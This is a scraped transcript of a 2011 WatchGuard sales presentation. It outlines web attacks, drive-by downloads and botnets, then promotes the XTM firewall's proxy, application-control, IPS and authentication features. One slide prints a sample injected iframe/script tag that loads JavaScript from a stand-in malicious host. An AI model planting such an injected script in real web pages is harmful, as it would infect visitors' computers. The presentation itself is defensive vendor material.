1 / 44

Web is the Battlefield Data Connectors – Portland July 21, 2011

Web is the Battlefield Data Connectors – Portland July 21, 2011. Web is the Battlefield. Sources: X-Force, Websense, Whitehat Security, Imperva, & 7Scan. Why the Web?. Common Web Attacks. Combined Web Attacks. Part 2: Drive-by Download. Part 1: Automated SQL Injection Attack. DB. DB.

tamra
Download Presentation

Web is the Battlefield Data Connectors – Portland July 21, 2011

An Image/Link below is provided (as is) to download presentation Download Policy: Content on the Website is provided to you AS IS for your information and personal use and may not be sold / licensed / shared on other websites without getting consent from its author. Content is provided to you AS IS for your information and personal use only. Download presentation by click this link. While downloading, if for some reason you are not able to download a presentation, the publisher may have deleted the file from their server. During download, if you can't get a presentation, the file might be deleted by the publisher.

E N D

Presentation Transcript


  1. Web is the Battlefield Data Connectors – Portland July 21, 2011

  2. Web is the Battlefield Sources: X-Force, Websense, Whitehat Security, Imperva, & 7Scan

  3. Why the Web?

  4. Common Web Attacks

  5. Combined Web Attacks Part 2: Drive-by Download Part 1: Automated SQL Injection Attack DB DB <iframe><script src=“http://EvilWebSite.cn/EvilJavaScript.js”></scirpt></iframe>

  6. Malicious Websites “Drive By Downloads” 1. A user is enticed to view a website. 2. This website installs an application locally without the users knowledge. 3. The Users computer “Dials Home” to an IRC server the hacker “Owns”. Encrypted DATA Leaving Your Network over SSL – 443 At this stage, the computer is under complete control of the hacker, and will follow any of his instructions from this day forward!

  7. What’s a Botnet?When Your Computer is Owned By Someone Else A botnet is a network of compromised computers under the control of a remote attacker/s.

  8. Botnets: Ultimate Blended Threat Botnets are the Swiss Army knife of the malware world, and bot-herders have many blades to choose from.

  9. Botnets: Mega D FBI Busts Alleged Mega D Botnet Mastermind More than 500,000 infected computers Oleg Nikolaenko 1. Initial Infection 2. Compromised computers are “owned” 3. “owned” computers are rented 4. SPAM campaign launched Paid $475,000 . Ten Billion Spam e-mails a day. = 30% OF ALL SPAM WORLDWIDE

  10. Extensible Threat Management • XTM 11.4 = Complete Web Security

  11. XTM Solution – The Application Proxy Packet Reassembly – since 1996 An Application Proxy Checks: Source IP, Destination IP, Port, Protocol If a matching rule (or service) is found: It opens the packet, reads the data, and if no malicious content is found it forwards the data. “Proxy firewall technologies have proven time and again to be more secure than "stateful" firewalls and will prove to be more secure than "deep inspection" firewalls.” What is "Deep Inspection"? – Marcus Ranum

  12. XTM Solution – Closing the Blind Spot HTTPS Proxy Normal SSL SSL Proxy With this method, the firewall can’t see what is “inside” the communicationbetween the PC and the website. With this method, the firewall can perform all checks that a normal HTTP Proxy can.

  13. XTM Solution – Acceptable Use WebBlocker • Establishing Acceptable Sites • 54 Categories • Proxy Sites, WebMail, P2P, IM, Hacking, Phishing, RDP sites • Database Maintained by WebSense • SpeedBump or Override • Logging and Reporting

  14. XTM Solution – Hijacked Sites Reputation Enabled Defense Cloud Based Dynamic Web Protection

  15. 2010-07-28 13:28:04 ProxyDrop: HTTP Virus found disp=DENY, policy=HTTP-proxy-00, protocol=http/tcp, src_ip=10.0.1.3, dst_ip=188.40.238.250, dst_port=80 proxy_act=HTTP-Students, virus=EICAR_Test, src_user=student4@Firebox-DB, host=www.eicar.org, path=/download/eicar.com 2010-07-28 13:29:59 ProxyDeny: HTTP bad reputation disp=DENY, policy=HTTP-proxy-00, protocol=http/tcp, src_ip=10.0.1.3 dst_ip=188.40.238.250 dst_port=80, proxy_act=HTTP-Students, src_user=student4@Firebox-DB, reputation=99, host=www.eicar.org, path=/download/eicar.com,

  16. Old View • Network Layer • Ports and Protocols • Source = IP Destination = IP • New View • Considering Content / Data • Controlling the Applications • Marketing/Facebook/Yes • General User/Facebook/No • Control the Allowed traffic and Stop the bad XTM Solution - Application Control

  17. Strategies – Application Control • Many apps tunnel right past your firewall • You lack visibility into what apps do on your network • Most malware propagates via 3rd party and web apps

  18. Application Control - Facebook Critical Mass • More than 500 million active users • 50% of our active users log on to Facebook in any given day • More than 6 billion minutes are spent on Facebook each day (worldwide) http://www.facebook.com/press/info.php?statistics

  19. Application Control - Facebook • More than 550,000 active applications currently on Facebook Platform • More than 250 applications have more than one million monthly active users • More than one million websites have integrated with Facebook Platform • More than 150 million people engage with Facebook on external websites every month http://www.facebook.com/press/info.php?statistics

  20. XTM SolutionControlling Applications Approved applications Control Applicationsby Category Network Peer to Peer Voice over IP Web Streaming Media Software Updates Tunneling Software Unapproved applications Control of 1,500 Applications Business Database File Transfer Instant Messaging Mail Web proxies

  21. XTM Solution Controlling ApplicationsEasy Setup - WSM

  22. XTM Solution Controlling ApplicationsSafely by User - Group

  23. XTM Solution – Remote Proxies - Tunneling • HTTP - HTTPs Proxy • WebBlocker • Well known proxy sites • Uncategorized Sites • Home proxies • Application Blocking • Find the By Pass Traffic • Logmein • UnltraSurf • Skype • P2P • Standard and Non Standard Ports

  24. XTM Solution - IPS Network Intrusions are Identified and Blocked Signature set covers : • SQL injections, cross-site scripting (XSS) • buffer overflows • denial of service • remote file inclusions Auto-Updating Scans all ports and protocols to block network, application, and protocol-based attacks Block = Dynamically add source IP to blocked sites list

  25. XTM Solution - AV Network Intrusions are Identified and Blocked Signature database updated hourly Dynamic heuristic analysis uses code emulation to identify polymorphic viruses and dangerous code that Inspection, of compressed files including: .zip, .gzip, .tar, .jar, .rar, .chm, .lha, .pdf, XML/HTML container, OLE container (Microsoft O ce documents), .cab, .arj, .ace, .bz2 (Bzip), .swf. Buffered scanning process ensures optimum performance for in-line HTTP scanning

  26. XTM Solution – Default Packet HandlingNetwork Intrusions are Identified and Blocked Dynamic AutoBlocking Identification of Attack behaviors Spoofing Ip Source Route Port Scans Address Scans Flood Attacks Static Blocked Sites StaitcBlockPorts with Autoblocking option Blocking Policies

  27. XTM – Custom SecurityBest Fit Security Trusted Low Security Required Untrusted High Security Required Medium Security

  28. XTM Solution - User AuthenticationRight Policies for the Right User • Firebox supports User Authentication • Authentication Servers : • Firebox Database (local) • Radius • SecurID • LDAP • Activate Directory (native)

  29. XTM Solution - User Authentication • Auto Redirect Authentication • User can authenticate to the Firebox using an authentication web portal • Or Auto redirect can be configured to this authentication page • User is authenticated with a 2 hour timeout (configurable)

  30. XTM Solution - User Authentication • Single Sign-On Authentication • Automatic authentication of Active Directory users, no manual authentication on the Firewall required anymore • Install WatchGuard Authentication Gateway software on a domain computer (SSO Agent) • The SSO Agent queries the PCs’ of the domain and inform the Firebox Alice Authorized without user having to log on manually SSO Query Alice logged in SSO Info User Alice = IP 10.0.1.100 SSO Agent

  31. XTM Solution - User Authentication • Multiple AD Domain Support • Unlimited AD domains for SSO, manual auth, SSLVPN and IPSec MUVPN. • Each SSO query, manual auth, SSLVPN, MUVPN request specifies the AD domain. • Each configured AD domain can have unique login attribute.

  32. XTM Solution - User Authentication Terminal Services • When this feature is enabled in a Microsoft Terminal Services environment, Fireware XTM uses a “user-resolver” agent deployed on the TS server to identify user so that the XTM appliance can apply firewall policy accordingly. • Agent and traffic handling for Microsoft Terminal Services • Agent installed on multiple TS servers

  33. XTM Solution - User Based PoliciesPeople not IPs • Security Policies applies to users, and not only on IP’s • Allows a build of different sets of policies for different people in the company, even in networks using DHCP

  34. XTM Solution - User Based PoliciesPeople not IPs • 2010-05-12 08:03:52 Deny src_ip=10.0.1.2 dst_ip=74.53.126.157 pr=http/tcpsrc_port=4833 dst_port=80 src_intf=Student-NET dst_intf=Comcast msg=ProxyDeny: HTTP Request categories pckt_len= ttl= policy=(HTTP-proxy-00) proxy_action=HTTP-Studentsproc_id="http-proxy" rc="594" proxy_act="HTTP-Students" cats="Proxies & Translators,cache-hit" op="GET" dstname="proxy.org" arg="/" src_user="student4@Firebox-DB" msg_id="262177" Traffic

  35. XTM Solution - User Based PoliciesReports - People not IPs • Web Traffic Summary • Intrusion Prevention Summary • AntiVirus Summary • spamBlocker Summary • Proxy Summaries • SMTP Proxy Summary • POP3 Proxy • Packet-Filtered Summary • Firebox Statistics • Exceptions • Management Server Audit • Management Reports WatchGuard Training

  36. XTM Solution- User Based Policies Reports - People not IPs • Summaries

  37. XTM Solution - User Based Policies Reports - People not IPs • Web Activity – Student1

  38. Peter McNaull Sales Engineer Peter.McNaull@watchguard.com

  39. Thanks

More Related